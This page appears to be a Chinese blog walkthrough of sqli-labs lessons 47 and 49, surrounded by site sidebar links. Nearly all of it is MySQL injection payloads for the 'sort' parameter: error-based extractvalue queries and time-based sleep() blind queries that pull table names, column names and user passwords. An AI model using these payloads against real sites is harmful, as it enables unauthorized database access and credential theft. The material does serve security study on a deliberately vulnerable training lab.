当前位置:网站首页>SQL注入 Less47(报错注入) 和Less49(时间盲注)
SQL注入 Less47(报错注入) 和Less49(时间盲注)
2022-07-31 02:27:00 【开心星人】
Less47和Less49都用不了rand()布尔盲注
因为有单引号闭合order by 'rand()'
这条语句显然是执行不了的
Less47
?sort=1' and extractvalue(0,concat(0x7e,database()))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")))--+
?sort=1' and extractvalue(0,concat(0x7e, (select group_concat(username,password) from users)))--+
Less49
?sort=1' and sleep(5)--+
?sort=1' and if(1,sleep(5),0)--+
?sort=1' and if(length(database())=8,sleep(5),0)--+
?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),0)--+
?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),0)--+
?sort=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)--+
?sort=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),0)--+
边栏推荐
- mysql 视图
- MPPT solar charge controller data collection - through the gateway acquisition capacity battery SOC battery voltage, wi-fi
- 19.支持向量机-优化目标和大间距直观理解
- 经典链表OJ强训题——快慢双指针高效解法
- vlan间路由+静态路由+NAT(PAT+静态NAT)综合实验
- Draw Your Cards
- 关于 mysql8.0数据库中主键位id,使用replace插入id为0时,实际id插入后自增导致数据重复插入 的解决方法
- golang GUI for nuxui — HelloWorld
- 静态路由+PAT+静态NAT(讲解+实验)
- leetcode-399: division evaluation
猜你喜欢
[Map and Set] LeetCode & Niu Ke exercise
Crypto Life, a day in the life of a Web3 project partner
Static route analysis (the longest mask matching principle + active and standby routes)
Manchester City confuses fans with smart scarf that detects emotions
Coldfusion file read holes (CVE - 2010-2861)
Unity界面总体介绍
Hanyuan Hi-Tech 8-channel HDMI integrated multi-service high-definition video optical transceiver 8-channel HDMI video + 8-channel two-way audio + 8-channel 485 data + 8-channel E1 + 32-channel teleph
【银行系列第一期】中国人民银行
Maximum monthly salary of 20K?The average salary is nearly 10,000... What is the experience of working in a Huawei subsidiary?
Force buckled brush the stairs (7/30)
随机推荐
Software testing basic interface testing - getting started with Jmeter, you should pay attention to these things
公司官网建站笔记(六):域名进行公安备案并将备案号显示在网页底部
Between two orderly array of additive and Topk problem
Fiddler captures packets to simulate weak network environment testing
静态路由解析(最长掩码匹配原则+主备路由)
Mathematics to solve the problem - circular linked list
Hanyuan Hi-Tech 8-channel HDMI integrated multi-service high-definition video optical transceiver 8-channel HDMI video + 8-channel two-way audio + 8-channel 485 data + 8-channel E1 + 32-channel teleph
拒绝加班,程序员开发的效率工具集
The difference between link and @import
Problems that need to be solved by the tcp framework
AI在医疗影像设备全流程应用
leetcode-399: division evaluation
【C语言基础】解决C语言error: expected ‘;‘, ‘,‘ or ‘)‘ before ‘&‘ token
力扣刷题之有效的正方形(每日一题7/29)
Maximum area of solar panel od js
Force buckled brush the stairs (7/30)
Draw Your Cards
Project development software directory structure specification
MPPT solar charge controller data collection - through the gateway acquisition capacity battery SOC battery voltage, wi-fi
Coldfusion file read holes (CVE - 2010-2861)